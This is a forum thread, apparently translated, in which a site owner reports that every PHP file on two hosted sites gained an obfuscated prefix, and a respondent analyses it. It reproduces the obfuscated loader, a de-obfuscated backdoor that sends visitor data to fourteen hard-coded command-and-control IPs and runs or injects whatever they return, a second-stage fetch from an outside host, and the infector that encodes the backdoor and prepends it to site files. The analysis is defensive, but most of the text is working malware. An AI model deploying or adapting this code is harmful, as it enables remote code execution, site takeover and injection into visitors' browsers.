Is my site hacked?
I might be insane to write this here, but right now I'm just scared. IPage has 2 websites.
All PHP pages on both of my sites were changed early in the morning around 9am and they all have the following prefix
<?php /*db9fce8e7e3b4062309ef5d7c0193183_on*/ $TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH= array('1822','1839','1818','1829');$JN26Obrx7D= array('9042','9057','9044','9040','9059','9044','9038','9045','9060','9053','9042','9059','9048','9054','9053');$ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg= array('1379','1378','1396','1382','1335','1333','1376','1381','1382','1380','1392','1381','1382');$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K="eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0poVjFsblMwTkdiV1JYTldwa1IyeDJZbXc1YkdWSGJIcGtTRTF2U1d0a2JHUkZNV2hpVjBWcFMxTnNOMGxEUW0xa1Z6VnFaRWRzZG1KcFFuUmlNbEptV1RJNWRVdERVbWxrVjFsd1pUTk9NR05zT1hCamJWWjNZa2RHYWxwVFoybFFSMHAyV2tockswbHBkMmxRUjBwMldraHJLMGxwZDJ0WmJsWnRURU5TYW1KdVVtWmhRMnMzWVZkWlowdERVbXBpYmxKbVlVTkJPVkJUUVhoTFUwSTNTa2RLTVZwcFFUbEpTRTR3WTJ3NWNHTnRWbmRpUjBacVdsTm5hVkJIU25aYVNHc3JTV2wzYVZCSFNuWmFTR3NyU1dsQmRVbElUakJqYld4M1l6SjRhR015YUd4amVXZHJXREZPUmxWc1drWlZiSE5wV2pJNWRscERTbVJMVTNkcldXNVdiVXRVYzJkamJWWXdaRmhLZFVsRFVtbGtWMWszWmxoT01HTnNPWEJqYlZaM1lrZEdhbHBUWjJsUVF6bHBZakpTTlZCcFNYTkphbmQyV1cwNWEyVlVOR2xNUTFKcFpGZFpjMHBIVG5Wa1JqbHZTMVIwY0ZwcFFXOUtSMDUxWkVZNWIwbEVNRGxKUkVWd1NVaHphMWx1Vm0xSlJEQm5Zek5TZVZneWJIbGFXRUp6V1ZkT2JFdERTVGhNTWtwMldraHJLMGxwZUhwa1NFcHdZMGhPYzFsWVRtOWFXRTF2U2tZNVZGSldTbGRTVmtwaVNXMWtkbUl5VVdsWVUydDFTV3AzZGxsdE9XdGxWRFJwVEVOU2FXUlhXWEJQZVVKNVdsaFNNV050TkdkS1Iwb3hXbXAwT1dOdFZqQmtXRXAxU1VOU2FXUlhXVGRtVjFveFltMU9NR0ZYT1hWSlJ6bDNXVmMxY21GVFoydFpibFp0UzFoemExb3pjR1phVTBFNVNVZGFhR0pJVG14UGVWSnZXREozWjFCVFFtOWFWMFpyV2xoS2VsZ3llSEJqTTFGdlMxUjBjRnBwUVc5aFZ6Vm1XVmhLZVZsWWEyOUphMDUyWW01U2JHSnVVWFJTVnpWcVlqSlNjR0p0WXpaSlIyUTJZVmhCYVV4RFFXdGhSamx6UzFOcloyVjVRV3RhTTNCbVdsTkJPVWxJVW5sa1YxVTNabGRzYlVsRFoydGFNM0JtV2xOc04wcElVblJqUjFwMVdWY3hiRWxFTUdka1IxWjBZMGMxYUdKVFoybE1NMUowWTBOSmMwbERTa2RVTURocFMxUjBiV0ZYZUd4WU0wSXhaRVk1YW1JeU5UQmFWelV3WTNsbmEyUkhNWGRhYlRWb1lsZFZjMGxEVW1sa1YxbHdUM2xTTmxwRFFUbEpSMlEyWWpOQ2JHSnBaMnRrUnpGM1dtMDFhR0pYVlhOSlEwcDVTV2xyTjBwSFRuWmlibEpzWW01U2VrbEVNR2RhTTNCNVdsZEdhMHREVWpaYVEzZG5UVlJCZDAxRVFYZE5SRUZ3VDNsU2FtSXlOVEJhVnpVd1kzbEJPVWxITVhaYVJqbHFZakkwYjBwSFRuWmlibEpzWW01U2VrdFVkRzVsYlU1ellqTk9iRXREVWpaYVEyczNaRmMxYzJGWE5YSkxRMUl3WWxoQ2JXSnRSblJhVTJzM1NrZE9kbUp1VW14aWJsSjZTVVF3WjFvemNHeGliVTUyV2tkVmIwcEhUblppYmxKc1ltNVNla3RVZERsSlIxWnpZekpWWjJWNVVtcGlNalV3V2xjMU1HTjVRVGxKUnpGMldrWTVhbUl5Tkc5S1Iwb3hXbWxyTjJaVFVuTmFWelJuVUZOQ2VtUklTbk5hVnpSdlNrZE9kbUp1VW14aWJsSjZTMVIwYjFwWFJtdGFXRWx2U1d0T2RtSnVVbXhpYmxGMFZFZFdkVm96VW05UGFVRnBUR2xTYzFwWE5IQlBNMHBzWkVoV2VXSnBaMnRaTWpsMVpFZFdkV1JJVFhCUE16Qm5XbTVXZFZrelVuQmlNalJuVWpKV01GUlhSblJaVTJkd1pYbFNkR0l6VW05YVdFbG5VRk5CYVdRelpETk1hbXMxV1cxc01HTjVOV3BpTWpCcFR6TktiR1JJVm5saWFVRnJZbGM1TUdGSFZubFBNekYyV1d3NWVtUkhSbmxrUTJkcFlqTkNhR0p0ZEhCSmFXczNXbTVXZFZrelVuQmlNalJuV1Zkb2JXUlhVbTFpUjFvMldrZG9iV0ZJVFc5S1NFSm9TMWh6YTJKWFJuUlpVMEU1U1VWa2JHUkZNV2hpVjBWdlMxUnphMXB0YkhOYVUwRTVTVWhXZVdKSFZuVlpNamxyV2xOb1psZ3dXa3BVUlZabVdIbHJOMkZYV1dkTFIyeDZZekpXTUV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldEQm9VRlV4VVdsWVUydHdaWGxTYjJJelRqQkpSREJuU2tZNVZGSldTbGRTVmtwaVNXdG9WVlpHUW1aVFJUbFVWa05LWkU4ek1HZGFWM2g2V2xOQ04wcEhhSFpqTTFGblVGTkJhVWxxZERsaFYxbG5TMGRzZW1NeVZqQkxRMUptVlRCV1UxWnJWbE5YZVVwVFVsVXhVRlpGVm1aUlZWSkZWV2xLWkV0VGJEZEtSMngzU1VRd1owcEdPVlJTVmtwWFVsWktZa2xzU2taVVZUbFZVbFk1UWxKRlVsTkpiREEzWmxOQ2JHSklUbXhKU0hOcllWaEJaMUJUUVdsSmFuUTVZVmRaWjB0SGJIcGpNbFl3UzBOU1psVXdWbE5XYTFaVFYzbEtTVlpHVWxGWU1VcEdVbXRXVTFKV1NXbFlVMnR3WlhsU2VWcFhXV2RRVTBJeFkyMTRiR0p0VG5aYVIxVnZTa1k1VkZKV1NsZFNWa3BpU1d0b1ZWWkdRbVpWYTFaSFVsWktSbFZwU21STFZIUTVTVWRXYzJNeVZXZGxlVko1V2xkWloxQlRRV2xKYW5RNVlWZFpaMHRIYkhwak1sWXdTME5TWmxVd1ZsTldhMVpUVjNsS1NWWkdVbEZZTVZaVVVsWktabEZWWkVaVWJGRnBXRk5yY0dWNVVqRlpVMEU1U1VoV2VXSkhWblZaTWpscldsTm9lbVJJU2pCaU1uaDJaREpXZVV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldERldWRkpXU21aUlZXUkdWR3hSYVZoVGEzQlBNekJuV2xkNGVscFRRamRLU0Zab1NVUXdaMGxwU1RkbVYyeHRTVU5vY0dNelRteGtRMmRyV0RGT1JsVnNXa1pWYkhOcFZWWldSbFZzYkdaVk1WSlRVMVUxU0Vsc01IQkxXSE5yWTFoTloxQlRRakZqYlhoc1ltMU9kbHBIVlc5S1JqbFVVbFpLVjFKV1NtSkpiRVpXVWxaS1dsZ3hUbFZWYTJ4UFVubEtaRXRVZERsSlIxWnpZekpWWjJWNVVuaGplVUU1U1VOSmFVOHpNR3RrV0VweldIcEJaMUJUUVdsaFNGSXdZMFJ2ZGt4NVNXZE1hVUZyWTBkRk4wcElWbmxpUmpoNFNVUXdaMGxwT1hGYVYxSndURzVDYjJORU9USmFXRXA2WVZjNWRWQlVRVFZQVkVWdFlsYzVNR0ZIVm5sUVUwbG5UR2xTZEZsWE1XaEpRelJuU1dsYWJXRlhlR3hRVTBsblRHbEJhMXB0YkhOYVUwRjFTVU5KYldGSE9YcGtSREJwU1VNMFowcEhhSFpqTTFGblRHbEJhVXB0YkhkUVUwbG5UR2xCYTJGWVFXZE1hVUZwU201S2JGcHFNR2xKUXpSblNraEtiRnBwUVhWSlEwbHRaRmRGT1VscFFYVktTRlpvU1VNMFowbHBXbmhqZWpCcFNVTTBaMHBJUm5wUGVWSXdZMjVyWjFCVFFqQmpibFpzVHpKc2JVdERRbTFrVnpWcVpFZHNkbUpzT1d4bFIyeDZaRWhOYjBsdFRqRmpiWGhtWVZjMWNHUkRTWEJKUTJ3M1NrZE9iMGxFTUdkWk0xWjVZa1k1Y0dKdGJEQkxRMUl4WTIxNFprMURRWFZKUTFJeFkyMTRaazFUYXpkWk0xWjVZa1k1ZWxwWVVuWmpTRkZ2U2tkT2IweERRa1JXVmtwTlZERkNWVmd4U2taV1JsWlRWR3hTVTFGVk5WUlNhMVpUVEVOQmVFdFVkR3BrV0VweldETk9iR1JIT1hka1EyZHJXVEpuYzBsRlRsWlZhM2hRVlVaU1psWkZiRTVTVlRsV1ZrTjNaMDE1YXpkS1NGWnpaRU5CT1VsSVVubGhWekJ2V1ROV2VXSkdPV3hsUjFacVMwTlNhbUZEYTNCUGVWSXdZMjVyWjFCVFFtMVpWM2g2V2xSME9VbEhiRzFKUTJkdllWYzFjRmd5Wkd4a1EyZHBXVmQ0YzJJelpHWmtXRXB6V0RKYWRtTkhWblZKYVd0d1NVTlpiVWxEVWpCamJtdHdTVWh6YTJSWGVEQkpSREJuWkVoS2NHSlRhRUZhYld4eldsWTVibHBZVW1aWk1qbDFaRWRXZFdSSVRXOUtTRlo1WWtZNGQwbEROR2RLU0ZaNVlrWTRlRXRUYXpkS1NGSjVaVk5CT1VsSFdtaGlTRTVzVHpNeGNGcHBaMnRrU0VvMVMxaHphMXB1UVdkUVUwSnRZekk1YW1FeU9YZGFWelJ2U2toQ2FFeERRVFJOUTNkblNrZFdlV050TlhaTVEwRnJXbGhLZVdNelVubE1RMEY2VFVOck4yRlhXV2RMUTFKdFkwTnJaMlY1VW5aa1dGRm5VRk5CYVZJd1ZsVkpRMUl4WTIxNFprMVRRa2xXUmxKUlRIcEZkVTFHZUhsWVJ6UnBUM2xTZG1SWVVXZE1hakJuU1d0b2RtTXpVVFpKUTFKM1dWWjRlVmhITkdsUGVWSjJaRmhSWjB4cU1HZEphMDUyWW0wMWJGa3pVbkJpTWpRMlNVVk9jMkl6VG14WVNFcGpZbXg0ZVZoSE5HbFBNbG96WTIxc01GcFRaMnRhYmtGelNVTlNkbVJZVVhCUGVWSjVXbGhSWjFCVFFXbEphblF6WVVkc2MxcFRRVzlKVjFwc1lqSlpiMHBIV25kTFUydG5aWGxTZVZwWVVXZEpRelE1U1VOQ2JWb3lWakJqZVdkcldtNUJjMGxFUlhsUFEyczNabGRhYW1KSE9YcGFVMmRyV201QmNFOTVVakZpU0ZGblVGTkNNR050YkhSTFNFNHhXVzVPTUdOcFoydGpiVll3VEVOQ2VtUklTbmRpTTAxdlNraEtiR1JEZDJkSmJIaDVXRWMxWTJOc2VIVkphV3RuUzNsQk1FdFRhemRtV0RCblNVZHNiVWxEYUhwa1NFcDNZak5OYjBwSVZuTmtRM2RwV2xoYWFHSkRTWEJKUTBVNVVGTkNiVmxYZUhwYVUydzNTa2h2WjFCVFFucGtTRXB3WTBoT2MxbFlUbTlhV0Uxdll6TlNlVmd6U214alIzaG9XVEpWYjBsdFZqSlpWM2RwVEVOSmFVeERVakZpU0ZGd1MxUnpaMXBZV21oaVEyZHJaV2xyTjBsSFZqUmhXRkZ2UzFSME9XRlhXV2RMU0U0d1kyNUNkbU41WjJ0a1YzZ3dURU5LYkZsdE5XaEphV3RuU1ZRd09VbEhXbWhpU0U1c1MxaHphMWd4VGtaVmJGcEdWV3h6YVZveU9YWmFRMHBrU1VRd1oyTXpVbmxZTTBwc1kwZDRhRmt5Vlc5SmJWWnBZbTFGYVV4RFNXbE1RMUl4WWtoUmNFOHpTbXhrU0ZaNVltbENNR051Vm14UE16RnNZa2hPYkVsSWRIbGFXRkl4WTIwMFoxcHRSbk5qTWxVM1psZ3dhMXB0UmpCaFIxWjVUV3gwWkVsRU1HZEphbU0wVEdwUk1reHFSVE5OZVRSNFRrTkpOMHBIV21oa1IyaHNZMnBLWWxoVFFUbEpRMGw0VG5wWmRVOVROSGxOVkdkMVRWUnJlRWxxYzJ0YWJVWXdZVWRXZVUxc2RHUkpSREJuU1dwcmVFeHFTWGxQUXpSNFRsUlJkVTFxVlRCSmFuTnJXbTFHTUdGSFZubE5iSFJrU1VRd1owbHFZek5NYW1kNFRHcEpNRTFUTkhsT1ZFMXBUM2xTYlZsWVVtOWFXRWw1VnpFd1oxQlRRV2xOVkdjd1RHcG5lVXhxUlhoT2VUUjRUVlJCYVU5NVVtMVpXRkp2V2xoSmVWY3hNR2RRVTBGcFRrUlpkVTVETkhsTlJFbDFUMVJOYVU5NVVtMVpXRkp2V2xoSmVWY3hNR2RRVTBGcFRrUlpkVTFxVVRWTWFsVTBUR3BGZWs1VFNUZEtSMXBvWkVkb2JHTnFTbUpZVTBFNVNVTkplRTU2V1hWUFV6UjVUa1JGZFUxVVZYZEphbk5yV20xR01HRkhWbmxOYkhSa1NVUXdaMGxxVVRKTWFrMHpUR3BGTWs5VE5ERk9hVWszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1RCT2FUUjZUVU0wTUUxVE5EVlBVMGszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1RWT1F6UjVUa1JKZFUxcVZURk1hazB4U1dwemExcHRSakJoUjFaNVRXeDBaRWxFTUdkSmFrVXpUME0wZUU1cVNYVk5WRWsxVEdwSmVVMTVTVGRLUjFwb1pFZG9iR05xU21KWVUwRTVTVU5KTTA5RE5EQk9lVFI0VDBSUmRVMTZUV2xQZVZKdFdWaFNiMXBZU1hsWE1UQm5VRk5CYVUxNlJYVk5WR2N3VEdwSmVrNURORFZPYVVrM1l6Sm9NVnB0V25OYVUyZHJXbTFHTUdGSFZubE5hV3MzV20wNWVWcFhSbXBoUTJkcldtMUdNR0ZIVm5sTmFVSm9ZM2xCYTJSWVNYQmxNbXh0U1VObloxbFhhRzFrVjFKdFlrZGFObHBIYUcxaFNFMXZTa2hXZVV0VFFYQkpTSE5uV1c1S2JGbFhjMmRQTXpFNVpsRTlQU0lwS1RzZyIpKTsg")); ";if (!function_exists("IOvqWhUNav1vXbeu")){ function IOvqWhUNav1vXbeu($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU,$iPKwKwD9uDGAJlgUcL87){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW = '';foreach($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU as $vwdHH9YC8Qv5SkhOG4ZoO9){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW .= chr($vwdHH9YC8Qv5SkhOG4ZoO9 - $iPKwKwD9uDGAJlgUcL87);}return $pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW;}$NfcYRc72PjdDxDTcZ9Y6 = IOvqWhUNav1vXbeu($TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH,1721);$c6gts3vwnaRtcGbfD4VN7obA8 = IOvqWhUNav1vXbeu($JN26Obrx7D,8943);$n82mSuiYNAS8X68E = IOvqWhUNav1vXbeu($ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg,1281);$TargEl = $c6gts3vwnaRtcGbfD4VN7obA8('$bigiJelZcd',$NfcYRc72PjdDxDTcZ9Y6.'('.$n82mSuiYNAS8X68E.'($bigiJelZcd));');$TargEl($cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K);} /*db9fce8e7e3b4062309ef5d7c0193183_off*/ ?>
I tried to get iPage support and they have no idea what happened. They just created a support ticket for me, which will be reviewed within 48 hours!
UPDATE
Got an email about the hack
From: Poor Victim hahahaha@gmail.com
Message: Why is this code on my server? why are you hacking my files ??? this code points to you !!! Prepare for trial
if (! function_exists ("GetMama")) {function mod_con ($ buf) {str_ireplace ("," ", $ buf, $ cnt_h); if ($ cnt_h == 1) {$ buf = str_ireplace (", "" . stripslashes ($ _ SERVER ["good"]), $ buf); return $ buE; } str_ireplace ("," ", $ buf, $ cnt_h), if ($ cnt_h == 1) {$ buf = str_ireplace (" ", stripslashes ($ _ SERVER [" good "])." ", $ buE) ; return $ buf;} return $ buf;} function opanki ($ buf) {$ gz_e = false; $ h_l = headers_list (); if (in_array ("Content-Encoding: gzip", $ h_l)) {$ gz_e = true;} if ($ gz_e) {$ tmpfname = tempnam ("/ tmp", "FOO"); file_put_contents ($ tmpfname, $ buf); $ zd = gzopen ($ tmpfname, "r"); $ contents = gzread ($ zd, 10000000); $ contents = mod_con ($ contents); gzclose ($ zd);unlink ($ tmpfname); $ contents = gzencode ($ contents); } else {$ contents = mod_con ($ buf); } $ len = strlen ($ contents); header ("Content-Length:". $ len); return ($ contents); } GetMama () function {$ mother = "www.99bits.com"; return $ mother; } ob_start ("opanki"); function ahfudflfzdhfhs ($ pa) {$ mama = GetMama (); $ file = urlencode (FILE); if (isset ($ _ SERVER ["HTTP_HOST"])) {$ host = $ _SERVER ["HTTP_HOST"]; } else {$ host = ""; } if (isset ($ _ SERVER ["REMOTE_ADDR"])) {$ ip = $ _SERVER ["REMOTE_ADDR"]; } else {$ ip = ""; } if (isset ($ _ SERVER ["HTTP_REFERER"])) {$ ref = UrlEncode ($ _ SERVER ["HTTP_REFERER"]); } else {$ ref = ""; } if (isset ($ _ SERVER ["HTTP_USER_AGENT"])) {$ ua = UrlEncode (strtolower ($ _ SERVER ["HTTP_USER_AGENT"])); } else {$ ua = ""; } if (isset ($ _ SERVER ["QUERY_STRING"])) {$ qs = UrlEncode ($ _ SERVER ["QUERY_STRING"]); } else {$ qs = ""; } $ url_0 = "http: //". $ pa; $ url_1 = "/jedi.php?version=0991&mother=". $ mom. "& file =". $ file. "& host = ". $ host." & ip = ". $ ip." & ref = ". $ ref." & ua = ". $ ua." & qs = ". $ qs; $ try = true if (function_exists (" curl_init ")) {$ ch = curl_init ($ url_0. $ url_1); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ ch, CURLOPT_TIMEOUT, 3); $ ult = trim (curl_exec ($ ch)); $ try = false;} if ((ini_get ("allow_url_fopen")) && $ try) {$ ult = trim (@file_get_contents ($ url_0. $ url_1)); $ try = false;} If ($ try) {$ fp = fsockopen ($ pa, 80, $ errno, $ errstr, 30), if ($ fp) {$ out = "GET $ url_1 HTTP / 1.0 \ r \ n "; $ out. =" Host: $ pa \ r \ n "; $ out. =" Connection: Close \ r \ n \ r \ n "; fwrite ($ fp, $ out); $ ret = ""; while (! Feof ($ fp)) {$ ret. = fgets ($ fp, 128);} fclose ($ fp);$ ult = trim (substr ($ ret, strpos ($ ret, "\ r \ n \ r \ n") + 4)); }} if (strpos ($ ult, "eval")! == false) {$ z = stripslashes (str_replace ("eval", "", $ ult)); Eval ($ r); Output(); } if (strpos ($ ult, "ebna")! == false) {$ _SERVER ["good"] = str_replace ("ebna", "", $ ult); return true; } else {return false; }} $ father2 [] = "78.46.173.14"; $ father2 [] = "176.9.218.191"; $ father2 [] = "91.228.154.254"; $ father2 [] = "77.81.241.253"; $ father2 [] = "184.82.117.110"; $ father2 [] = "46.4.202.93"; $ father2 [] = "46.249.58.135", $ father2 [] = "176.9.241.150"; $ father2 [] = "46.37.169.56"; $ father2 [] = "46.30.41.99"; $ father2 [] = "94.242.255.35";$ father2 [] = "178.162.129.223"; $ father2 [] = "78.47.184.33"; $ father2 [] = "31.184.234.96"; shuffle ($ father2); foreach ($ father2 as $ ur) {if (ahfudflfzdhfhs ($ ur)) {break; }}}
Sent from (ip address): 64.118.163.18 (64.118.163.18) Date / Time: April 9, 2012 7:15 pm Based on (referent): http://www.99bits.com/contact-us/ Usage ( user agent): Mozilla / 5.0 (Macintosh, Intel Mac OS X 10_7_3) AppleWebKit / 535.19 (KHTML like Gecko) Chrome / 18.0.1025.151 Safari / 535.19
Thanks to each of you for all the help and knowledge. For some strange and unknown reason, my blog was targeting this hack attempt. I closed the blog for a while until I can clean all files (since all my PHP files are infected).
source to share
In its current form, the script has the following command and control servers ("c & c"):
$father2[] = "78.46.173.14";
$father2[] = "176.9.218.191";
$father2[] = "91.228.154.254";
$father2[] = "77.81.241.253";
$father2[] = "184.82.117.110";
$father2[] = "46.4.202.93";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "46.30.41.99";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "78.47.184.33";
$father2[] = "31.184.234.96";
The script will randomize their order on each run. Then it tries to send a GET request containing these variables
$_SERVER["HTTP_HOST"]
$_SERVER["REMOTE_ADDR"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["QUERY_STRING"]
__FILE__
to the first c & c server, if the response does not contain eval
or ebna
(or the server is down) it tries to use the next c & c server, etc.
If the server returns c & c: ebna <somestring>
, <somestring>
will be placed in the body tag of your website. This way a hacker can insert arbitrary html / js code.
Otherwise, when the server c & c returns eval <somestring>
, <somestring>
eval () will be passed. This way a hacker can even execute arbitrary php code.
I was able to get the server c & c to return an eval response by simply passing all the url parameters like : http://<server-ip>/jedi.php
, here is the answer:
eval $try = true;
if (function_exists("curl_init")) {
$ch = curl_init('http://2brewers.com/99.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
}
if ((ini_get('allow_url_fopen')) && $try) {
$ult = trim(@file_get_contents('http://2brewers.com/99.txt'));
$try = false;
}
if ($try) {
$fp = fsockopen('2brewers.com', 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET /99.txt HTTP/1.0\r\n";
$out. = "Host: 2brewers.com\r\n";
$out. = "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = '';
while (!feof($fp)) {
$ret. = fgets($fp, 128);
}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
$xx = 'ev'.'al';
$_FILE = create_function('$_', $xx.'($_);');
$_FILE($ult);
which loads and executes http://2brewers.com/99.txt
, which looks like this:
function get_file_extension($file_name) {
return substr(strrchr($file_name, '.'), 1);
}
function pass_gen($dol) {
$source[0] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$source[1] = "0123456789";
$length = rand(5, 50);
$passwordlen = intval($length) - 1;
$use = implode("", $source);
$max_num = strlen($use) - 1;
$rp = '';
for ($i = 0; $i < $passwordlen; $i++) {
$x = rand(0, $max_num);
$rp. = $use[$x];
}
if ($dol) {
return '$'.$source[0][rand(0, strlen($source[0]) - 1)].$rp;
} else {
return $source[0][rand(0, strlen($source[0]) - 1)].$rp;
}
}
function GetMass($text, $code, $massname) {
$a = str_split($text);
foreach($a as $b) {
$evmas[] = ord($b) + $code;
}
$z = $massname."= array('".implode("','", $evmas)."');";
return $z;
}
function Codee($code) {
$coo = 'if (!function_exists("F1")){ function F1($v6,$v7){$v8 = \'\';foreach($v6 as $v9){$v8 .= chr($v9 - $v7);}return $v8;}$v1 = F1($mas1,$code1);$v2 = F1($mas2,$code2);$v3 = F1($mas3,$code3);$v4 = $v2(\'$v5\',$v1.\'(\'.$v3.\'($v5));\');$v4($v0);}';
$f1 = pass_gen(false);
$coo = str_replace('F1', $f1, $coo);
$v1 = pass_gen(true);
$coo = str_replace('$v1', $v1, $coo);
$v2 = pass_gen(true);
$coo = str_replace('$v2', $v2, $coo);
$v3 = pass_gen(true);
$coo = str_replace('$v3', $v3, $coo);
$v4 = pass_gen(true);
$coo = str_replace('$v4', $v4, $coo);
$v5 = pass_gen(true);
$coo = str_replace('$v5', $v5, $coo);
$v6 = pass_gen(true);
$coo = str_replace('$v6', $v6, $coo);
$v7 = pass_gen(true);
$coo = str_replace('$v7', $v7, $coo);
$v8 = pass_gen(true);
$coo = str_replace('$v8', $v8, $coo);
$v9 = pass_gen(true);
$coo = str_replace('$v9', $v9, $coo);
$v0 = pass_gen(true);
$coo = str_replace('$v0', $v0, $coo);
$mas1 = pass_gen(true);
$coo = str_replace('$mas1', $mas1, $coo);
$mas2 = pass_gen(true);
$coo = str_replace('$mas2', $mas2, $coo);
$mas3 = pass_gen(true);
$coo = str_replace('$mas3', $mas3, $coo);
$code1 = rand(1000, 10000);
$coo = str_replace('$code1', $code1, $coo);
$code2 = rand(1000, 10000);
$coo = str_replace('$code2', $code2, $coo);
$code3 = rand(1000, 10000);
$coo = str_replace('$code3', $code3, $coo);
for ($i = 0; $i < 3; $i++) {
$code = base64_encode($code);
$code = 'eval(base64_decode("'.$code.'")); ';
}
$code = base64_encode($code);
$z = GetMass('eval', $code1, $mas1);
$z. = GetMass('create_function', $code2, $mas2);
$z. = GetMass('base64_decode', $code3, $mas3);
$z. = $v0.'="'.$code.'";';
$z. = $coo;
return $z;
}
function modify($fname) {
$tmp = file_get_contents($fname);
$md_start = md5($tmp);
chmod($fname, 0666);
$md = md5($fname);
$pattern = '/function GetMama\(\).*\]\}\)\)\{break;\}\}/i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pattern = '/\/\*god_mode_on.*god_mode_off\*\//i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pattern = '/\/\*'.$md.'_on.*'.$md.'_off\*\//i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pattern = '/<\?php[\s]*\?>/i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pos = strpos($tmp, 'GetMama');
$pos2 = strpos($tmp, 'god_mode_on');
if (($pos === false) && ($pos2 === false)) {
$code_t = 'if (!function_exists("GetMama")){ function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} function GetMama(){$mother = "###";return $mother;}ob_start("opanki");function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;} if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {$ret .= fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}} if (strpos($ult,"eval") !== false){$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();}if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}else {return false;}}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}';
$mama = 'wtf';
$mama = $_SERVER["HTTP_HOST"];
$code_t = str_replace('###', $mama, $code_t);
$code = '<'.'?php ';
$prob = rand(5, 500);
for ($i = 0; $i < 700 + $prob; $i++) {
$code = $code.' ';
}
$code_t = Codee($code_t);
$code = $code.'/*'.$md.'_on*/ '.$code_t.' /*'.$md.'_off*/'.' ?>'.$tmp;
$f = fopen($fname, "w");
fputs($f, $code);
fclose($f);
}
chmod($fname, 0644);
}
function dir_num($dir) {
global $fileslist;
static $deep = 0;
$odir = @opendir($dir);
